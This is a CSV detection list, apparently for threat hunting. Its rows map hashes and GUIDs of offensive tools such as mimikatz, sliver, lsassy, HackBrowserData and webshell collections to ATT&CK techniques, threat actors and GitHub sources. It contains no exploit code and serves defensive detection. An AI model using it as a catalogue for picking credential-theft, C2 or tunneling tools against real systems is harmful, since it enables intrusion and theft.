"*0bcc96d2405f07c6ad41b4904c79008707584c523b20df5e2689d8fc25412029*",".{0,1000}0bcc96d2405f07c6ad41b4904c79008707584c523b20df5e2689d8fc25412029.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","21496"
"*0bcce0874f30d8d38fabb4fcc1bb44fc60d811c7ff1ae3d3869601d44d65a80a*",".{0,1000}0bcce0874f30d8d38fabb4fcc1bb44fc60d811c7ff1ae3d3869601d44d65a80a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21497"
"*0bd2acc669f0084786cd7df668e279e21e71556e9e927235a54f8bc6c1a27fa7*",".{0,1000}0bd2acc669f0084786cd7df668e279e21e71556e9e927235a54f8bc6c1a27fa7.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","21499"
"*0BD5DE6B-8DA5-4CF1-AE53-A265010F52AA*",".{0,1000}0BD5DE6B\-8DA5\-4CF1\-AE53\-A265010F52AA.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz GUID project","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#GUIDproject","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21500"
"*0bde1c200a95461bc8ae1bab8713ec0adb7c4c01616f37d7cfa395bfc94a0dd2*",".{0,1000}0bde1c200a95461bc8ae1bab8713ec0adb7c4c01616f37d7cfa395bfc94a0dd2.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21501"
"*0bdf933e7adf4960c337d0badbd044ccf14ab36731360c5c92001c9c5feded21*",".{0,1000}0bdf933e7adf4960c337d0badbd044ccf14ab36731360c5c92001c9c5feded21.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21502"
"*0be065c34cebd132ea23ef20d51f13c21ad31428db2342bcddc0b4e182625e5e*",".{0,1000}0be065c34cebd132ea23ef20d51f13c21ad31428db2342bcddc0b4e182625e5e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21503"
"*0bed6254a9818d22f531a9433f9b20d31eefe0550ece4ba12f4e05e8db5c2cfb*",".{0,1000}0bed6254a9818d22f531a9433f9b20d31eefe0550ece4ba12f4e05e8db5c2cfb.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","21507"
"*0bef08167ba7fbe62a07368279b1b6d8450cdb04696eb9abf18b02be519abd99*",".{0,1000}0bef08167ba7fbe62a07368279b1b6d8450cdb04696eb9abf18b02be519abd99.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","21508"
"*0bef49d95cf04914b2824fe3957dc3b9f66447c150877254ddbbf36dd7b231b8*",".{0,1000}0bef49d95cf04914b2824fe3957dc3b9f66447c150877254ddbbf36dd7b231b8.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","0","#filehash","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","21509"
"*0byt3m1n1-V2*",".{0,1000}0byt3m1n1\-V2.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","21512"
"*0c021fa1272bc222489a6a54e46a10c85d57d758071b310afc66441f72d4a482*",".{0,1000}0c021fa1272bc222489a6a54e46a10c85d57d758071b310afc66441f72d4a482.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21513"
"*0C117EE5-2A21-496D-AF31-8CC7F0CAAA86*",".{0,1000}0C117EE5\-2A21\-496D\-AF31\-8CC7F0CAAA86.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","#GUIDProject","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","21514"
"*0c19f220188feff67261fd9ac6448ee06b84b8e836f1e558592c2b381e671194*",".{0,1000}0c19f220188feff67261fd9ac6448ee06b84b8e836f1e558592c2b381e671194.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21517"
"*0c1bb8a937aea9a05ec6524c92bf16f3387a52b94ec2ece27e2d98e1ee9fa721*",".{0,1000}0c1bb8a937aea9a05ec6524c92bf16f3387a52b94ec2ece27e2d98e1ee9fa721.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21518"
"*0c246202c0bc2e6db131df9e2bececcd1ed552a0d17dbb5da8552750d98bcdf1*",".{0,1000}0c246202c0bc2e6db131df9e2bececcd1ed552a0d17dbb5da8552750d98bcdf1.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","21523"
"*0c28929dbbc6cfe733ed93670025f18f03642a4b323d7fd123ae63c9366afc31*",".{0,1000}0c28929dbbc6cfe733ed93670025f18f03642a4b323d7fd123ae63c9366afc31.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","21524"
"*0c2b8e134f235970726f41712824ce62f42635e4bd647dfcdb58c8fff88cff36*",".{0,1000}0c2b8e134f235970726f41712824ce62f42635e4bd647dfcdb58c8fff88cff36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21525"
"*0c2bcf6e46488c60fbaf6ac42680e04d6b7dd461139acfd86b934cb6d43a7c33*",".{0,1000}0c2bcf6e46488c60fbaf6ac42680e04d6b7dd461139acfd86b934cb6d43a7c33.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21526"
"*0c2c7f0208bac76684a0e8f5960772b22014f417a81caba157b0b512e13404b2*",".{0,1000}0c2c7f0208bac76684a0e8f5960772b22014f417a81caba157b0b512e13404b2.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21527"
"*0c2ddbc7ae28df7912929d7523e0116c5ba39a00c842ce23876c3c1ad5490c43*",".{0,1000}0c2ddbc7ae28df7912929d7523e0116c5ba39a00c842ce23876c3c1ad5490c43.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","21528"
"*0c3379e3cc4fab5cbf1ce0aff52559da191a2b97c6fa27d5122232649f78e7cc*",".{0,1000}0c3379e3cc4fab5cbf1ce0aff52559da191a2b97c6fa27d5122232649f78e7cc.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","#filehash","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","21529"
"*0c35e11198ce91ce473f38aa0d3d4ac7a6c7e1c50ef229f5f6019ad95846ea4c*",".{0,1000}0c35e11198ce91ce473f38aa0d3d4ac7a6c7e1c50ef229f5f6019ad95846ea4c.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","21530"
"*0c38fc9f070a1db92c2007447a97b7777565ca630097ca73a1b3c9f649d7183e*",".{0,1000}0c38fc9f070a1db92c2007447a97b7777565ca630097ca73a1b3c9f649d7183e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21531"
"*0C3EB2F7-92BA-4895-99FC-7098A16FFE8C*",".{0,1000}0C3EB2F7\-92BA\-4895\-99FC\-7098A16FFE8C.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#GUIDproject","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","21532"
"*0c509e431004929c0aaa10ba671db16a8d02003ac17419fdc31687bf9747e4b6*",".{0,1000}0c509e431004929c0aaa10ba671db16a8d02003ac17419fdc31687bf9747e4b6.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","21534"
"*0c5259c25ef3911a8936b0216cf77edb932743a82992d6f77e8e420795697fdd*",".{0,1000}0c5259c25ef3911a8936b0216cf77edb932743a82992d6f77e8e420795697fdd.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21535"
"*0c5c865669aa4b9ae6687ff50eb22888b0c3afcf6a7cfdfc63a2a2dea3c6d9f5*",".{0,1000}0c5c865669aa4b9ae6687ff50eb22888b0c3afcf6a7cfdfc63a2a2dea3c6d9f5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21536"
"*0c5f8a2ed62d10986a2dd39f52886c0900a18c03d6d279207b8de8e2ed14adf6*",".{0,1000}0c5f8a2ed62d10986a2dd39f52886c0900a18c03d6d279207b8de8e2ed14adf6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21537"
"*0c61a84a8b1d0ec97638505b72cd333f82840ffbe7f39c5ffae8efb31e45d0f1*",".{0,1000}0c61a84a8b1d0ec97638505b72cd333f82840ffbe7f39c5ffae8efb31e45d0f1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21538"
"*0c64315cdf7bd0e51e76f04510c91d931b8b4de73f06ea7931666e62cb34739f*",".{0,1000}0c64315cdf7bd0e51e76f04510c91d931b8b4de73f06ea7931666e62cb34739f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21539"
"*0c649fe30b4986eff17b3913a02a89728126d530298659f1fe1ea07570428c2b*",".{0,1000}0c649fe30b4986eff17b3913a02a89728126d530298659f1fe1ea07570428c2b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21540"
"*0c67fcccaa5ee7a7c0ff82a821e38543b219d7777a07f4394741f9d64f21bf45*",".{0,1000}0c67fcccaa5ee7a7c0ff82a821e38543b219d7777a07f4394741f9d64f21bf45.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","21543"
"*0c79bc58224e71882e48b6230f3a90ec516f30ba8a6a431f7d2f6323de581a81*",".{0,1000}0c79bc58224e71882e48b6230f3a90ec516f30ba8a6a431f7d2f6323de581a81.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","21545"
"*0c79c5147e4ff87b8b655873c328b10976a68e7226089c1a7ab09a6b74038b13*",".{0,1000}0c79c5147e4ff87b8b655873c328b10976a68e7226089c1a7ab09a6b74038b13.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21546"
"*0c79c5147e4ff87b8b655873c328b10976a68e7226089c1a7ab09a6b74038b13*",".{0,1000}0c79c5147e4ff87b8b655873c328b10976a68e7226089c1a7ab09a6b74038b13.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21547"
"*0c7db3f692255998b52505a79ab8323887da451368d02a2e9aa115ae48bd579e*",".{0,1000}0c7db3f692255998b52505a79ab8323887da451368d02a2e9aa115ae48bd579e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21549"
"*0c7fdc11cd301457131335dc023726493d839cd18ab659c9ab3a53fbe24269c1*",".{0,1000}0c7fdc11cd301457131335dc023726493d839cd18ab659c9ab3a53fbe24269c1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21550"
"*0C81C7D4-736A-4876-A36E-15E5B2EF5117*",".{0,1000}0C81C7D4\-736A\-4876\-A36E\-15E5B2EF5117.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#GUIDproject","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","21552"
"*0C89EC7D-AC60-4591-8F6B-CB5F20EC0D8D*",".{0,1000}0C89EC7D\-AC60\-4591\-8F6B\-CB5F20EC0D8D.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","21553"
"*0c8e33156886e733d0021652fe0a13b03946fc09adb392458fb2a435fb402d85*",".{0,1000}0c8e33156886e733d0021652fe0a13b03946fc09adb392458fb2a435fb402d85.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21554"
"*0C8F49D8-BD68-420A-907D-031B83737C50*",".{0,1000}0C8F49D8\-BD68\-420A\-907D\-031B83737C50.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","21555"
